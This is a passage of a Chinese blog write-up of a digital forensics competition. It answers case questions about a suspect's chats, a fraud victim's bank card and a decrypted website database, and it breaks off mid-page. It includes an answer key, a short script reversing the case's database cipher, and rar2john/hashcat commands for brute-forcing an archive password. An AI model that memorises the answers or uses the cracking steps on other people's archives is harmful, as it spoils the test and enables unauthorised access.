src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106222958537.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106222958537.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201106222958537"></p><blockquote><ol start="74"><li><p>嫌疑人是通过何种方式联系到售卖恶意程序的卖家的:(<strong>B</strong>)</p><p>A.微信 B.QQ C.短信 D.邮件</p></li><li><p>嫌疑人和卖家的资金来往是通过何种方式:(<strong>A</strong>)</p><p>A.微信 B.QQ C. 银行转账 D.支付宝</p></li><li><p>嫌疑人在犯罪过程中所使用的 <code>QQ</code> 账号为:(<strong>A</strong>)</p><p><code>A. 1649840939 B. 1137588348 C. 364505251 D. 1722629449 </code></p></li><li><p>卖家所使用的微信账号 ID 为:(<strong>C</strong>)</p><p><code> A. refrain_C B. flame_guan C. chao636787 D. sword19880521</code></p></li><li><p>嫌疑人下载了几个恶意程序到本机:(<strong>B</strong>)</p><p><code> A. 1 B. 2 C. 3 D. 4</code></p></li></ol></blockquote><p>我们在火眼取证中找到手机备份,然后添加到检材,然后分析,密码??试一下检材4桌面上的``niuroumian6`!对了!</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107124338615.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107124338615.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107124338615"></p><p>然后我们翻一翻他的社交~看看<code>QQ</code>……两个号,一个号好没营养……看看另外一个,<code>woc</code>,大型犯罪现场!!!发现一些关键信息,我们做个笔记:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125224818.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125224818.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107125224818"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125240145.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125240145.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107125240145"></p><p>再瞅瞅微信,发现记录和<code>QQ</code>对应:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125640097.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125640097.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107125640097"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130016567.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130016567.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107130016567"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130027391.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130027391.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107130027391"></p><blockquote><ol start="79"><li><p>恶意程序被嫌疑人保存在什么位置:(<strong>D</strong>)</p><p> <code>A.D:/DOWNLOAD B. C:/USER C. C:/ D.D:/ </code></p></li><li><p>恶意程序是使用什么工具下载到本地的:(<strong>C</strong>)</p><p><code> A. Chrome B. Internet Explorer C. edge D.迅雷</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131020480.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131020480.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107131020480"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131312244.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131312244.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107131312244"></p><blockquote><ol start="81"><li>嫌疑人是什么时间开始对受害者实施诈骗的:(<strong>C</strong>)</li></ol><p><code> A. 2019-07-13 19:14:44 B. 2019-07-13 19:24:44 C. 2019-07-13 19:04:44 D. 2019-07-13 19:44:44</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131606833.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131606833.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107131606833"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131624592.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131624592.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107131624592"></p><blockquote><ol start="82"><li><p>请提取受害者的银行卡信息,银行卡账号为:(<strong>B</strong>)</p><p><code> A. 6225000088217563457 B. 6225000088257563456</code></p><p><code> C. 6225000088257563458 D. 6225000088257563459</code></p></li></ol></blockquote><p>在电脑里面的备份平台里面有一台虚拟机,搞出来,有密码???搞他!我们先<a href="https://www.cnblogs.com/lcl0421/p/9227805.html">修改密码</a>,在<code>/home/admin888/fund/</code>文件夹下发现<code>sqlite</code>数据库,我们导出来~</p><blockquote><p><code>$ scp [email protected]:/home/admin888/fund/db.sqlite3 ./db.sqlite3</code></p><p><code>$ python3 -m http.server 2021</code></p></blockquote><p>然后根据手机号定位受害人是赵昊,数据库里面查看银行卡号:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154313948.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154313948.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107154313948"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154258903.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154258903.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107154258903"></p><blockquote><ol start="83"><li><p>请综合分析,嫌疑人第一次入侵目标服务器的行为发生在:(<strong>C</strong>)</p><p><code> A. 2019-07-13 16:17:30 B. 2019-07-13 16:17:32 C. 2019-07-13 16:17:35 D. 2019-07-13 16:17:38</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154615513.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154615513.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107154615513"></p><blockquote><ol start="84"><li><p>请综合分析,嫌疑人入侵服务所使用的登陆方式为:(<strong>B</strong>)</p><p> A. SSH 密码登陆 B. SSH 密钥登陆 C. 连接后门程序 D.FTP 登陆</p></li></ol></blockquote><p>我们之前在检材四中的xshell数据文件中见到了密钥文件:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107155204586.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107155204586.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201107155204586"></p><blockquote><ol start="85"><li><p>可知嫌疑人应对外发送过邮件,请分析并找到发出的邮件,可知邮件的发送时间为:(<strong>B</strong>)</p><p><code> A. 2019-07-13 17:55 B. 2019-07-14 17:56 C. 2019-07-14 17:57 D. 2019-07-14 17:58</code></p></li><li><p>可知嫌疑人应对外发送过邮件,请分析并找到发出的邮件,可知邮件收件人为:(<strong>B</strong>)</p><p><code> A. [email protected] B. [email protected] C. [email protected] D. [email protected]</code></p></li></ol></blockquote><p>这个题目是真的骚,我们在前面有发现,他下载过<code>Foxmail</code>,于是我们查看<code>Foxmail</code>使用痕迹,然后把时间定位到<code>2019-07-13 17:52:20</code>,所以一般就选择A,但是是错的……因为他不一定用<code>Foxmail</code>发文件。所以我们换一个思路,在检材三中(嫌疑人使用的VPN服务器)有数据包,既然他发邮件,那么一定走了代理,所以我们再研究研究那个检材3的那两个数据包。这里有一个姿势点:</p><blockquote><p>常用的电子邮件协议有<code>SMTP、POP3、IMAP4</code>它们都隶属于<code>TCP/IP</code>协议簇.</p></blockquote><p>所以我们数据包里面直接找这几个协议:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108094246421.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108094246421.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108094246421"></p><blockquote><ol start="87"><li><p>请重构被入侵的网站,可知该网站后台管理界面的登陆用户名为:(<strong>C</strong>)</p><p><code> A. root B Administered C. admin D. user</code></p></li></ol></blockquote><p>重构网站需要先恢复数据库,我们再检材2中有加密程序,有加密过的数据库。所以我们开始老本行!逆!</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108111125565.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108111125565.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108111125565"></p><p>思路很简单,上<code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">"db.encrypt"</span>,<span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> s=f.read()</span><br><span class="line"></span><br><span class="line">r=<span class="built_in">bytes</span>([((x^<span class="number">0xaa</span>)+<span class="number">256</span>-<span class="number">66</span>)%<span class="number">256</span> <span class="keyword">for</span> x <span class="keyword">in</span> s])</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'db'</span>, <span class="string">'wb'</span>) <span class="keyword">as</span> inp:</span><br><span class="line"> inp.write(r)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>然后计算<code>SHA256</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108112522288.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108112522288.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108112522288"></p><p>我们在检材4的<code>C</code>盘中看到了一个待挂载的硬盘:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154253039.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154253039.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108154253039"></p><p>然后双击,显示<code>Bitlocker</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154511990.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154511990.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108154511990"></p><p>我们打开<code>Bitlocker</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154544420.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154544420.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108154544420"></p><p>现在我们缺少密码……还记得前面在翻<code>QQ</code>的时候看到的那个消息嘛,提示一下:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154812496.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154812496.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108154812496"></p><p>我们再根据他的<code>QQ</code>号和上面这个内容,可以猜到,在前面我们分析的邮件正是他用来备份密码的右键,我们复原一下邮件:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162121999.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162121999.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108162121999"></p><p>发现4个<code>EML</code>文件,导出以后,直接下载<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162907437.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162907437.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201108162907437"></p><p>但是有密码!!!我们联想检材4桌面上的字典和<code>niuroumian6</code>,我们尝试用这个字典来爆破压缩包。这里爆破用的工具是开膛手<code>john</code>和<code>hashcat</code>:</p><blockquote><p><code>$ rar2john.exe BitLocker.rar </code>BitLocker.rar:$rar5$16$0c231f49ba3ded4bc944dee58f2be760$15$2a5c3ec4a5380b7a9d5517cc8ba386b6$8$07400e39e08a2e03`</p><p><code>$ hashcat.exe -m 13000 -a 0 $rar5$16$0c231f49ba3ded4bc944dee58f2be760$15$2a5c3ec4a5380b7a9d5517cc8ba386b6$8$07400e39e08a2e03 新建文本文档.txt</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210507588.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210507588.png" srcset="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAABGdBTUEAALGPC/xhBQAAADhlWElmTU0AKgAAAAgAAYdpAAQAAAABAAAAGgAAAAAAAqACAAQAAAABAAAAAaADAAQAAAABAAAAAQAAAADa6r/EAAAAC0lEQVQIHWNgAAIAAAUAAY27m/MAAAAASUVORK5CYII=" alt="image-20201110210507588"></p><p><img 